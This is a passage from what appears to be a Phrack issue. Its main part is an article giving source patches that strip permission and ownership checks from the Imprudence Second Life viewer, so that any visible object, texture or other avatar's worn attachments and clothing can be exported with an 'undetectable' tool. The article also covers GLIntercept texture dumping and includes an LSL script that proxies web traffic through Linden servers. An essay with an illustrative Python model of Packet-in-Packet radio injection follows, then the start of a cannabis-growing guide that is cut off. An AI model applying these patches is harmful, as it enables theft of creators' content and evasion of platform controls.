This checks to see if you have full permissions, and are the owner and the
creator of the object you want to export. This only applies to the Second
Life grid. If you are not on the Second Life grid, then it checks to see if
you are the owner and have full permissions. We will not bother and will
modify it to always return that all our permissions are in order:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
{
    return true;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The next stop is in the same file, at the following method:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
{
    if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
    {
        // If we are not in Second Life, don't bother
        return asset_id;
    }

    LLUUID texture = LL_TEXTURE_PLYWOOD;
    if (asset_id == texture ||
            asset_id == LL_TEXTURE_BLANK ||
            asset_id == LL_TEXTURE_INVISIBLE ||
            asset_id == LL_TEXTURE_TRANSPARENT ||
            asset_id == LL_TEXTURE_MEDIA)
    {
        // Allow to export a grid's default textures
        return asset_id;
    }
    LLViewerInventoryCategory::cat_array_t cats;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

There is a complete explanation of what this does in the comments. This
checks to see whether you are in Second Life, and if you are, it goes
through a series of inefficient and poorly coded checks to ensure that you
are indeed the creator of the texture by testing whether the texture is in
your inventory. We eliminate those checks and make it return the asset ID
directly:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
{
    return asset_id;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Once you compile the modified viewer, you will be able to export any
object, along with its textures that you can see in-world. The next step is
to modify the skin (i.e. Imprudence's user interface) so that you may 
export attachments from the GUI.

First, let us enable the pie "Export..." button. I will assume that you use
the default skin. The next stop is at
linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You
will need to add:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
        name="Object Export">
        <on_click function="Object.Export" />
        <on_enable function="Object.EnableExport" />
    </menu_item_call>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now, we need to enable it for any avatar at
linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will
need to add:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
    <menu_item_call enabled="true" label="Export" mouse_opaque="true"
        name="Object Export">
        <on_click function="Object.Export" />
        <on_enable function="Object.EnableExport" />
    </menu_item_call>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

After that, we must add them so the viewer picks up the skin options. We
open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie
menu section:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// Avatar pie menu
...
    addMenu(new LLObjectExport(), "Avatar.Export");
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

We do the same for the attachments section:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
// Attachment pie menu
...

    addMenu(new LLObjectEnableExport(), "Attachment.EnableExport");
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Now we are set. However, the viewer performs a check in "EnableExport" in
linden/indra/newview/llviewermenu.cpp which we need to knock out:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectEnableExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLControlVariable* control =
            gMenuHolder->findControl(userdata["control"].asString());

        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();

        if((object != NULL) &&
            (find_avatar_from_object(object) == NULL))
        {

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The code initially checks whether the object exists, if it is not worn by
an avatar, and then applies permission validations to all the children
(links) of the object. If the object exists, if it is not worn by an avatar
and all the permissions for all child objects are correct, then the viewer
enables the "Export..." control. Since we do not care either way, we enable
the control regardless of any checks.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectEnableExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLControlVariable* control =
            gMenuHolder->findControl(userdata["control"].asString());

        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();

        if(object != NULL)
        {
            control->setValue(true);
            return true;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

I have left the NULL check for the object since if you happen to mis-click
and select something other than an object, then the "Export..." pie menu
will be enabled and your viewer will crash. More precisely, if you instruct
the viewer to export something using the object export feature, and it is
not an object, the viewer will crash since there are no checks performed
after this step.

Further on in linden/indra/newview/llviewermenu.cpp there is another test
to see whether the object you want to export is attached to an avatar. In
that case, the viewer considers it an attachment and disallows exporting.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        LLViewerObject* object =
        LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
        if (!object) return true;

        LLVOAvatar* avatar = find_avatar_from_object(object);

        if (!avatar)
        {
            PrimBackup::getInstance()->exportObject();
        }

        return true;
    }
};
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Again, we proceed the same way and knock out that check which will allow
us to export objects worn by any avatar:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class LLObjectExport : public view_listener_t
{
    bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
    {
        PrimBackup::getInstance()->exportObject();

        return true;
    }
};
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

These changes will be sufficient in order to transform your viewer into an
undetectable tool that will allow you to export any object along with the
associated textures.

There are indeed easier ways, for example toggling God mode from the
source code and bypassing most checks. However, that will be discussed
in the upcoming full article, along with explanations on what Linden are
able to detect and wearable exports.

Alternatively, and getting closer to a "bot", there are ways to program
a fully non-interactive client [11] that will export everything it sees
automatically. This will also be covered in the upcoming article since it
takes a little more than hacks. The principle still holds: "who controls
an asset UUID, has at least permission to grab the asset off the asset
server".

------[ II. Part II - Textures

In the first part we have talked about exporting objects. There is more fun
you can have with the viewer too, for example, grabbing any texture UUID,
or dumping your skin and clothes textures.

What can we do about clothes? If you have an outfit you would like to grab,
with the previous method you will only be able to export primitives without
the wearable clothes. How about backing up your skin?

The 1.x branch of the Linden viewer has an option, disabled by default and
only accessible to grid Gods, which will allow you to grab baked textures.
Grid Gods are essentially Game Masters and in the case of Second Life, they
consist of the "Linden"s, which are Linden Labs employees represented
in-world by avatars, conventionally having "Linden" as their avatar's last
name.

We open up linden/indra/newview/llvoavatar.cpp and we find:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
{
    // Check if the texture hasn't been baked yet.
    if (!isTextureDefined(index))
    {
        lldebugs << "getTEImage( " << (U32) index << " )->getID() "
            "== IMG_DEFAULT_AVATAR" << llendl;
        return FALSE;
    }

    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
        return TRUE;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Aha, so it seems that grid Gods are permitted to grab textures. That is
fine, so can we:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
{
    // Check if the texture hasn't been baked yet.
    if (!isTextureDefined(index))
    {
        lldebugs << "getTEImage( " << (U32) index << " )->getID() "
            "== IMG_DEFAULT_AVATAR" << llendl;
        return FALSE;
    }

    return TRUE;

    if (gAgent.isGodlike() && !gAgent.getAdminOverride())
        return TRUE;

// yadda, yadda, yadda, blah, blah, blah...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

But that is not sufficient. The 1.x viewer code has an error (perhaps
intentional) which will crash the viewer when you try to grab the lower
part of your avatar. In the original code at
linden/indra/newview/llviewermenu.cpp, we have:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        else if ("lower" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
        else if ("skirt" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Which must be changed to:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        else if ("lower" == texture_type)
        {
            handle_grab_texture( (void*)TEX_LOWER_BAKED );
        }
        else if ("skirt" == texture_type)
        {
            handle_grab_texture( (void*)TEX_SKIRT_BAKED );
        }
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

You are free to recompile and go to the menu and dump the textures on you,
including your skin. To grab your skin, you can undress your avatar and
grab the textures. You can then export them using the method from Part I.
For clothes, you would do the same by clothing your avatar, grabbing the
relevant textures and then exporting them using the method from Part I.

You might notice that the texture that will be dumped to your inventory is
temporary. That is, it is not an asset and registered with the asset
server. Make sure you save the texture, or, if you want to save a bunch of
them, consider reading the first part of the article and place the textures
on a primitive and export the entire primitive.

Since the textures are baked, they represent an overlay of your skin and
your clothes. If you want to extract just the clothes, you might need to
edit the grabbed textures in a graphics editing program to cut out the skin
parts. However, it might be possible to use a transparent texture for your
skin when you grab the textures. In that case, you will not have to edit
the clothes at all.

------[ II. Part II - Textures
            II. i. Textures - GLIntercept

The GLIntercept method involves grabbing a copy of GLIntercept and
replacing the .dll file with the GLIntercept one. By doing that, when you
run the Second Life viewer, all the textures will be stored to your hard
drive in the images directory. It is a resource consuming procedure because
any texture that your viewer sees is saved to your hard-drive.

Therefore, if your only interest is to build a collection of textures, then
get GLIntercept and, after installing it, replace the opengl .dll from your
viewer directory with the one from GLIntercept. If you cannot find the
viewer's opengl .dll, then just copy it as a new file because the viewer
will pick it up. I recommend setting your graphics all the way to low and
taking it easy because in the background, the GLIntercept .dll will create
an images directory and dump all the possible textures, including the
textures belonging to the UI.

There is a lot of fuss going on about GLIntercept. Some strange people say
it does not work anymore and some funny people come up with ideas like
encrypting the textures. The principle that GLIntercept works on is trivial
to the point of making the whole fuss meaningless. GLIntercept, when used
in conjunction with the viewer, is an extra layer between your viewer and
opengl. Anything that your graphics card renders can be grabbed. Other
similar software [8] can achieve the same effect described in this article;
however, it would require you to convert the structures to the Second Life
format. The usage of GLIntercept is not restricted to Second Life; you can
go ahead and grab anything you like from any program that uses opengl. It
literally puts a dent (crater?) into content stealing, the important phrase
being: "anything that your graphics card renders, can be grabbed".

------[ III. Postamble

Second Life is a vanity driven virtual universe which is plagued by the
most horrible muppets that fake anonymity could spawn. The Lindens maintain
full control and all the content you upload automatically switches
ownership to Linden Labs via the Terms of Service which make you renounce
your copyright. Not only that, but there are plenty of rumours you are
tracked and they have a dodgy "age-verification" system in place which
forces you to send your ID card to be checked by "a third party". Under
these circumstances, it is of course questionable what they do with that
data and whether they link your in-world activities to your identity.

There is more that could be potentially done, the viewers are so frail and
incredibly poorly coded from all perspectives and certainly not the quality
you would expect from an institution that makes billions of shineys. There
have been exploits before such as Charlie Miller's Quicktime exploit [9]
which was able to gain full control of your machine (patched now) and
Michael Thumann's excellent presentation which goes over many concepts of
Second Life as well as how they can be abused [10].

One of the further possibilities I have been looking into (closely related
to Michael Thumann's presentation) is to use LSL and create an in-world
proxy that will enable your browser to connect to a primitive in-world and
bounce your traffic. There is a limitation imposed on the amount of
information an LSL script can retrieve off the web, however I am still
looking into ways to circumvent that. Essentially the idea would be to use
the Linden Labs servers as a proxy to carry out all the surfing. At the
current time of writing this article, I do have a working LSL
implementation (you can see an example of that in [A. 1]) that can grab 2kb
off any website (this is a limitation imposed by the LSL function
llHTTPRequest()). Additionally, a PHP page could be created that rewrites
the content sent back by the LSL script so that the links send the
requests back through the script in Second Life.

Not only IPs, but headers, timezone, DNS requests and everything else gets
spoofed that way.

The possibilities are limitless and I have seen viewers emerge that rely on
this concept, such as CryoLife or NeilLife. However, the identification
strings sent by the few versions lying around the net have been tagged and
any user connecting with them would be banned. If you want to amuse
yourself further, you may want to have a look at:

http://wiki.secondlife.com/wiki/User:Crone_Dryke

Dedicated to CV. Many thanks to the Phrack Staff for their help and their
interest in the article.

Thank you for your time!

------[ B. Bibliography

[1] The Second Life website,
    http://secondlife.com/
[2] Linden Labs official website,
    http://lindenlab.com/
[3] Linden Scripting Language LSL Wiki,
    http://wiki.secondlife.com/wiki/LSL_Portal
[4] Imprudence Viewer downloads,
    http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads
[5] The Phoenix Viewer,
    http://www.phoenixviewer.com/
[6] The third-party viewer policy,
    http://secondlife.com/corporate/tpv.php
[7] GLIntercept,
    http://oreilly.com/pub/h/5235
[8] Ogre exporters,
    http://www.ogre3d.org/tikiwiki/OGRE+Exporters
[9] QuickTime exploit granting full access to a user's machine,
    http://securityevaluators.com/content/case-studies/sl/
[10] Thumann's presentation on how Second Life can be exploited,
     https://www.blackhat.com/presentations/bh-europe-08/Thumann/
     Presentation/bh-eu-08-thumann.pdf
[11] OpenMetaverse Library for Developers,
     http://lib.openmetaverse.org/wiki/Main_Page

------[ A. Appendix

[A. 1] LSL script which requests a publicly accessible URL from the SIM it
is currently located on, and proxies any HTTP request made to that public
URL suffixed with "/url=<some URL>", where "some URL" represents a web
address. The script fetches 2k of the content and then sends it back to the
browser.

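key uReq;   // id of the pending incoming (browser) request
key sReq;   // id of the outgoing llHTTPRequest() made on its behalf

default
{
    state_entry()
    {
        // Ask the SIM for a public URL; the grant arrives in http_request().
        llRequestURL();
    }

    changed(integer change)
    {
        // The public URL does not survive inventory changes: start over.
        if (change & CHANGED_INVENTORY) llResetScript();
    }

    http_request(key id, string method, string body)
    {
        if (method == URL_REQUEST_GRANTED) {
            // body holds the granted public URL; report it to the owner.
            llOwnerSay(body);
            return;
        }
        if (method == "GET") {
            uReq = id;
            // Split the query string at "=" into a name and a value.
            list pURL = llParseString2List(
                llGetHTTPHeader(id, "x-query-string"), ["="], []);
            // Only a "url" parameter triggers an outgoing fetch.
            if (llList2String(pURL, 0) == "url")
                sReq = llHTTPRequest(llList2String(pURL, 1),
                    [HTTP_METHOD, "GET"], "");
        }
    }
    http_response(key request_id,
        integer status,
        list metadata,
        string body)
    {
        // Relay the fetched body to the waiting incoming request.
        if (sReq == request_id) llHTTPResponse(uReq, 200, body);
    }
}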


|=[ 0x06 ]=---=[ How I misunderstood digital radio; or,
                 "Weird machines" are in radio, too! - M.Laphroaig
                                                       pastor@phrack ]--=|

                          ...there be bytes in the air
                             and Turing machines everywhere

When one lays claim to generalizing a class of common misconceptions,
it is fitting to start with one's own.  These are the things I used to
believe about digital radio -- or, more precisely, would not have
questioned if explicitly presented with them.

=== Wishful thinking ===

The following statements are obviously related and mutually
reinforcing:

1. Layer 1 delivers to Layer 2 either fully intact frames, exactly as
   transmitted by a peer in their entirety, or slightly corrupted
   versions of such frames if CRC checking in Layer 1 is disabled, as
   it sometimes is for sniffing.

2. In order to be received at Layer 1, a frame must be transmitted
   with proper encapsulation by a compatible Layer 1 transmitter using
   the exact same PHY protocol. There is no substitution in commodity
   PHY implementations for the radio chip circuitry activated when the
   chip starts transmitting a queued Layer 2 frame, except by use of
   an expensive software defined radio.

3. Layer 1 implementations have means to unambiguously distinguish
   between the radio transmission that precedes a frame -- such as the
   frame's preamble -- and the frame's actual data. One cannot be
   mistaken for another, or such a mistake would be extremely rare and
   barely reproducible.

4. Should a receiver miss the physical beginning of a frame
   transmission on the air due to noise or a timing problem, the rest
   of the transmission is wasted, and no valid frame could be received
   at least until this frame's transmission is over.

For Layer 1 injection, this would imply the following limitations:

a. In order to successfully "inject" a crafted Layer 1 frame (that is,
   to have it received by the target) the attacker needs to (1) build
   the binary representation of the full frame in a buffer, (2)
   possess a radio capable of transmitting the buffer's binary
   contents, and (3) instruct the radio to transmit the buffer,
   possibly bypassing
   hardware or firmware implementations of protocol features that may
   alter or side-effect the transmission.

b. In particular, the injecting radio must perfectly cooperate by
   producing the proper encapsulating physical signals for the
   preamble, etc., around the injected buffer-held frame. Without such
   cooperation, injection is not possible.

c. Errors due to radio noise can only break injection.  The injecting
   transmission, as a rule, needs to be more powerful to avoid being
   thwarted by ambient noise.

d. Faraday cages are the ultimate protection against injection, as
   long as the nodes therein maintain their software and hardware
   integrity, and do not afford any undue privileges to the attacker.

A high-level summary of these beliefs could be stated like
this: the OSI Layer 1/Layer 2 boundary in digital radio is a _validity
and authenticity filter_ for frames. In order to be received, a frame
must be transmitted in its entirety via an "authentic" mechanism, the
transmitting chip's logic going through its normal or nearly normal
state transitions, or emulated by a software-defined radio.

Each and every one of these is _false_, as demonstrated by the
existence of Packet-in-Packet (PIP) [1,2] exploits.

=== A Packet Breaks Out ===

On a cold and windy February 23rd of 2011, my illusions came to an
abrupt end when I saw the payload bytes of an 802.15.4 frame's data
--- transmitted inside a valid packet as a regular payload ---
received as a frame of its own, reproducibly.

The "inner" packet, which I believed to be safely contained within the
belly of the enclosing frame, would occasionally break out and arrive
all by itself, without any sign of the encapsulating packet.

Every once in a while, there was no whale, just Jonah. It was a very
unwelcome miracle for someone who believed he could be safe from even
SDR-wielding attackers inside a cozy Faraday cage, as long as his
utopian gated community had no compromised nodes.

Where was my encapsulation now? Where was my textbook's OSI model?

Lies, all lies. Sweet illusions shattered by cruel Packet-in-Packet,
the textbook illusion of neat encapsulation chief among them. How the
books lied.

=== Packet-in-Packet: a miracle explained ===

The following is a typical structure of a digital radio frame
as seen by the radio:

------+----------+-----+-------------------------------+-----+------
noise | preamble | SFD | L2 frame reported by sniffers | CRC | noise
------+----------+-----+-------------------------------+-----+------

The receiving radio uses the preamble bytes to synchronize itself, at
the same time looking for SFD bytes digitally. Once a sequence of SFD
bytes matches, the radio starts treating further incoming bytes as the
content of the frame, saving them and feeding them into its checksum
computation.

Consider the situation when the "L2 payload bytes" transmitted after
the SFD themselves contain the following, say, as a valid payload of
a higher layer protocol:

---------+-----+--------------------+--------------------------------
preamble | SFD | inner packet bytes | valid checksum for inner packet
---------+-----+--------------------+--------------------------------

If the original frame's preamble and SFD are intact, all of the above
will be received and passed on to the driver and the OS as regular
payload bytes as intended.

Imagine, however, that the original SFD is damaged by noise and missed
by the radio. Then the initial bytes of the outer frame will be
interpreted as noise, leading up to the embedded "preamble" and "SFD"
of the would-be payload. Instead, these preamble and SFD will be taken
to indicate an actual start of a real frame, and the "inner" packet
will be heard, up to and including the valid checksum.  The following
bytes of the enclosing frame will again be dismissed as noise, until
another sequence of "preamble + SFD" is encountered.

Thus, due to noise damaging the real SFD and the receiver's inability
to tell noise bytes from payload bytes except by matching for an SFD,
the radio will occasionally receive the inner packet -- precisely as
if it were sent alone, deliberately.

Thus a remote attacker capable of controlling the higher level
protocol payloads that get transmitted over the air by one of the
targeted radios on the targeted wireless network is essentially
capable of occasionally injecting crafted Layer 1 frames -- without
ever owning any radio or being near the targeted radios' physical
location.

Yes, Mallory, there is such a thing as Layer 1 wireless injection
without a radio. No, Mallory, a mean, nasty Faraday cage will not
spoil your holiday.

=== The reality ===

Designers of Layer 2 and above trust Layer 1 to provide valid or
"authentic" objects (frames) across the layer boundary.  This trust is
misplaced.

There are two factors that likely contribute to it among network
engineers and researchers who are not familiar with radio Layer 1
implementations but have read drivers and code in the layers above.

Firstly, the use of the CRC-based checking throughout the OSI model
layers likely reinforces the faith in the ability of Layer 1 to detect
errors -- any symbol errors that accidentally corrupt the encapsulated
packet's structure while on the wire.

Secondly, the rather complex parsing code required for Layer 2 and
above to properly de-encapsulate respective payloads may lead its
readers to believe that similarly complex algorithms take place in
hardware or firmware in Layer 1.

However, L1 implementations are not validity, authenticity, or
security filters, nor do they maintain complex enough state or context
about the frame's bytes they are receiving.

Aside from analog clock synchronization, their anatomy is nothing more
than that of a finite automaton that pulls bytes (more precisely,
symbols of the code that encodes the transmitted bytes, which differ
per protocol, both in bits/symbol and in modulation) out of the air,
continually.

The inherently noisy RF medium produces a constant stream of symbols.
The probability of hearing different symbols is actually non-uniform
and depends on the details of modulation and encoding scheme, such as
its error-correction.

As it receives the symbol stream, this automaton continually compares
a narrow window within the stream against the SFD sequence known to
start a frame. Once matched by this shift register, the symbols start
being accumulated in a buffer that will eventually be checksummed and
passed to the Layer 2 drivers.

Beyond the start-of-frame matching automaton, the receiver has no
other context to determine whether symbols are in-frame payload or
out-of-frame noise. It has no other concept of encapsulation or frame
validity.  A digital radio is just a machine for pulling bytes out of
the air.  It has weird machines in that same way -- and for the same
reasons -- that a vulnerable C program has weird machines.

Such encapsulation based on such a simple automaton is easily and
frequently broken in the presence of errors. All that is needed is for the
chip's idea of the start-of-frame sequence -- typically, some of the
preamble + a Start of Frame Delimiter, a.k.a. Sync, or just the
latter where the preamble is used exclusively for analog
synchronization -- to not match, for the subsequent payload bytes to be
mistaken for the start-of-frame sequence or noise.

In fact, to mislead the receiving automaton as to the _intended
meaning_ of symbols (or bytes they are supposed to make up or come
from) no crafting manipulation is necessary: the receiving machine is
so simple
that _random noise_ alone provides sufficient "manipulation" needed to
confuse its state and allow for packet-in-packet injection.

Thus injection for attackers without an especially cooperative radio
or in fact any radio at all -- so long as the attacker can leverage
some radio near the target to produce a predictable stream of symbols
-- is enabled by broken encapsulation.
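
The receiver automaton described in this section, run over the
Packet-in-Packet layout from the previous one, as an added Python model
(not code from the original article). The framing constants (four zero
preamble bytes, SFD 0xA7, one length byte, little-endian CRC-16) are
assumptions modelled on 802.15.4; all function names, payload strings and
noise bytes are constructed for illustration.

```python
"""Constructed model of a Layer 1 receiver: hunt for sync, then read one frame."""

# Assumptions, modelled on 802.15.4 framing (not taken from the article):
PREAMBLE = b"\x00" * 4          # four zero bytes
SFD = b"\xa7"                   # start-of-frame delimiter
SYNC = PREAMBLE + SFD           # the only thing the receiver ever matches on
MAX_BODY = 127                  # the length field is 7 bits wide


def crc16(data: bytes) -> int:
    """Bitwise CRC-16, polynomial 0x1021 reflected (0x8408), initial value 0."""
    crc = 0
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc


def build_frame(payload: bytes) -> bytes:
    """Bytes as they go on the air: preamble | SFD | length | payload | CRC."""
    body = payload + crc16(payload).to_bytes(2, "little")
    if len(body) > MAX_BODY:
        raise ValueError("payload too long for one frame")
    return SYNC + bytes([len(body)]) + body


def receive(stream: bytes) -> list:
    """Run the receiver automaton over a byte stream.

    Returns the payloads that pass the CRC and are handed to Layer 2.
    """
    delivered = []
    window = bytearray()                  # the "shift register"
    pos = 0
    while pos < len(stream):
        # State HUNT: every byte is noise until the window equals SYNC.
        window.append(stream[pos])
        pos += 1
        del window[:-len(SYNC)]           # keep only the last len(SYNC) bytes
        if bytes(window) != SYNC:
            continue
        window.clear()
        # State IN_FRAME: trust the next byte as a length, buffer that many.
        if pos >= len(stream):
            break
        length = stream[pos] & 0x7F
        body = stream[pos + 1:pos + 1 + length]
        pos += 1 + length
        if length < 2 or len(body) < length:
            continue                      # runt or truncated frame: dropped
        payload, fcs = body[:-2], body[-2:]
        if crc16(payload) == int.from_bytes(fcs, "little"):
            delivered.append(payload)     # CRC good: passed up to Layer 2
    return delivered


# Constructed sample data.
NOISE = b"\x5a\xc3\x99\x3c"               # stand-in for channel noise
INNER = build_frame(b"INJECTED")          # a complete frame, used as payload
OUTER_PAYLOAD = b"app data " + INNER + b" more"   # higher-layer payload


def on_air(sfd_bit_error: bool) -> bytes:
    """Outer frame surrounded by noise; optionally one bit of its SFD flipped.

    The single flipped bit stands in for noise damaging the real SFD.
    """
    air = bytearray(NOISE + build_frame(OUTER_PAYLOAD) + NOISE)
    if sfd_bit_error:
        air[len(NOISE) + len(PREAMBLE)] ^= 0x01
    return bytes(air)


def embedded_sync_offsets(payload: bytes) -> list:
    """Defender-side check (hypothetical helper): byte offsets at which a
    higher-layer payload contains the receiver's SYNC sequence.
    Byte-aligned only, as is everything in this model."""
    hits = []
    start = payload.find(SYNC)
    while start != -1:
        hits.append(start)
        start = payload.find(SYNC, start + 1)
    return hits


if __name__ == "__main__":
    print("intact SFD :", receive(on_air(False)))
    print("damaged SFD:", receive(on_air(True)))
    print("SYNC found in payload at:", embedded_sync_offsets(OUTER_PAYLOAD))
```

With the SFD intact the model delivers the whole outer payload; with one
bit of the SFD damaged it delivers only the inner packet, CRC and all.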

=== What does this remind me of? ===

I remember the first time I witnessed a buffer overflow exploit, when
my Internet-facing Linux box, named Miskatonic, was exploited.  Whoever
did that also opened a whole new world to me, and I'll be happy to
repay that debt with a beer should we ever meet in person.

At that time, I was a fairly competent C programmer, but I saw the
world in terms of functions that called other functions.  Each of
these functions returned after being called to whichever address it
had been called from. I thought that the only way for a piece of code
to ever get executed was to be inside a function called at some point.

In other words, I regarded C functions as "atomic" abstractions.  Even
though I implemented simple recursion and mutually recursive functions
via my own stacks a few times, it never occurred to me that a real
call stack could be anything other than a neat and perfect data
structure with "push", "pop", and referencing of variable slots.

Beware layers of abstractions. Take their expected, specified
operation on faith, and they will appear real. It is tempting to trust
a lower abstraction layer to provide _only_ the valid data structures
your next layer expects to receive, to assume that the lower layer's
designers already took responsibility for it. It is so tempting to
limit your considerations to the detail and complexity of the layer
you are working in.

Thus the layers of abstraction become boundaries of competence.

This temptation is overpowering in well-designed, abstraction-oriented
environments, where you lack any legal or effective means of PEEK-ing
or POKE-ing the underlying layers.  Dijkstra decried BASIC as a
mind-mutilating language, but most real BASICs had PEEK and POKE to
explore the actual RAM, and one sooner or later found himself
wondering what they did. I wonder what Dijkstra would have said about
Java, which entirely traps the mind of a programmer in its
abstractions, with no hint of any other ways or idioms of programming.


=== How we could have avoided falling for it ===

The key to understanding this design problem lies in the incorrect
assumptions about how input is handled: in particular, about how it is
handled as a language, and about the machine that handles it.

The _language-theoretic approach_ to finding just such misconceptions
and the exploitable bugs based on them was developed by Len Sassaman
and Meredith L. Patterson. Watch their talks [3,4] and look for
upcoming papers at http://langsec.org

Such a language-theoretic analysis at L1 would have revealed this
immediately. Valid frames are phrases in the language of bytes that a
digital radio continually pulls out of the air, and the L1 seen as an
automaton for accepting valid phrases (frames) should reject
everything else.

The start-of-frame-delimiter matching functionality within the radio
chip is just a shift register and a comparison circuit -- too simple
an automaton, in fact, to guarantee anything about the validity of the
frame. With this perspective, the misconception of L2 expecting frame
encapsulation and validity becomes clear, almost trivial. The key to
finding the vulnerability is in choosing this perspective.

Conversely, there is no nicer source of 0-day than false assumptions
about what is on the other side of an interface boundary of a
textbook-blessed design. The convenient fiction of classic
abstractions leads one to imagine a perfect and perfectly trustworthy
machine on the other side, which takes care of serving up only the
right kind of inputs to one's own layer. And so layers of abstraction
become boundaries of competence.

References:

[1] Travis Goodspeed, Sergey Bratus, Ricky Melgares, Rebecca Shapiro,
    Ryan Speers,
    "Packets in Packets: Orson Welles' In-Band Signaling Attacks for
    Modern Radios",
    USENIX WOOT, August 2011,
    http://www.usenix.org/events/woot11/tech/final_files/Goodspeed.pdf

[2] Travis Goodspeed,
    "Remotely Exploiting the PHY Layer",
    http://travisgoodspeed.blogspot.com/2011/09/
      remotely-exploiting-phy-layer.html

[3] Len Sassaman, Meredith L. Patterson,
    "Exploiting the Forest with Trees",
    BlackHat USA, August 2010,
    http://www.youtube.com/watch?v=2qXmPTQ7HFM

[4] Len Sassaman, Meredith L. Patterson,
    "Towards a formal theory of computer insecurity: a language-theoretic
    approach",
    Invited Lecture at Dartmouth College, March 2011,
    http://www.youtube.com/watch?v=AqZNebWoqnc


|=[ 0x07 ]=--=[ The 1130 Guide to Growing High-Quality Cannabis - 1130 ]-=|

So you wanna grow marijuana? You wanna get high off your own buds?  Well
this guide will surely teach you how. I'll assume you're already somewhat
familiar with Mary-Jane, so I won't explain all the jargon in deep detail.


Table of Contents

0x00: General Botany -- basic plant knowledge
0x01: Environment -- air, temperature, and humidity
0x02: Container -- size and shape
0x03: Water -- temperature and filtering
0x04: Nutes -- plant food
0x05: Conductivity and pH -- don't burn the roots
0x06: Hydroponics -- how-to hydro
0x07: Light -- which and why
0x08: Cloning -- make 'em root
0x09: Vegging -- big 'n' bushy
0x0A: Flowering -- dense and dank
0x0B: Harvest -- chop, dry, and cure
0x0C: Extracts -- smoke, vape, and cook
0x0D: Signs and Symptoms -- oh noes, wtf mang!



0x00: General Botany

If you've never grown before, growing cannabis can be difficult. Really
though, it just depends on how much time you put in. As long as you check
in on your plants 3-4 times a day, you'll begin to learn enough about them
to grow some really dank buds. But to get you started, here are a few
things you should know.

Plants need light, water, air, and food to grow. A lack of any one of these
at best will slow its growth and at worst will cause part or all of it to
die. Light is generally the most limiting factor in determining a plant's
growth rate, but that assumes all other factors are maxed. Plants absorb
water and nutrients through their roots and carbon dioxide (CO2) through
their leaves. They also need a bit of oxygen which they absorb through both
leaves and roots.

Chlorophyll is a chemical in their leaves that's used as a catalyst with
energy from light to convert CO2 and water into sugars and oxygen.
Chlorophyll-a is also what gives leaves their green color, while
Chlorophyll-b is responsible for the yellow color of leaves.

Plants need oxygen in order to burn energy to stay alive and grow, like we
do, but plants produce much more oxygen than they consume. Plants are not
able to move enough oxygen from the leaves down to the roots, so roots must
have access to some oxygen in order to stay alive. When soil dries, air
